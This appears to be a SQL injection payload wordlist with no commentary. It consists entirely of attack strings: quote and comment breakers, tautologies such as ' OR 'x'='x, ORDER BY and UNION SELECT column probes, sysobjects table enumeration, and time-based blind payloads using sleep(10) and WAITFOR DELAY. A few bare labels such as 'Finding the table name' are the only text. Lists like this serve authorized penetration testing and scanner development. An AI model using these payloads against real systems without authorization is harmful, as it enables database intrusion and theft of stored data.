"
""
#
%
'
''
'='
+
,
-- -
/
/*
/*…*/ 
//
;
\
\\
`
``
||
'=0--+
%00
;%00
1*56
1 AND (SELECT * FROM Users) = 1	
1-false
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
1' ORDER BY 1--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1-true
-1' UNION SELECT 1,2,3--+
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
-2
%2c(select%20*%20from%20(select(sleep(10)))a)
AND 0
AND 1
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
AND false
' AND id IS NULL; --
' AND MID(VERSION(),1,1) = '5';
AND true
Finding the table name
' GROUP BY columnnames having 1=1 --
'LIKE'
' or "
-- or # 
" OR "" = "
' OR '' = '
' OR '1
' OR 1 -- -
 OR 1=1
" OR 1 = 1 -- -
' OR 'x'='x
,(select * from (select(sleep(10)))a)
Time-Based:
'''''''''''''UNION SELECT '2
' UNION SELECT sum(columnname ) from tablename --
@@variable	global variable
@variable	local variable
';WAITFOR DELAY '0:0:30'--
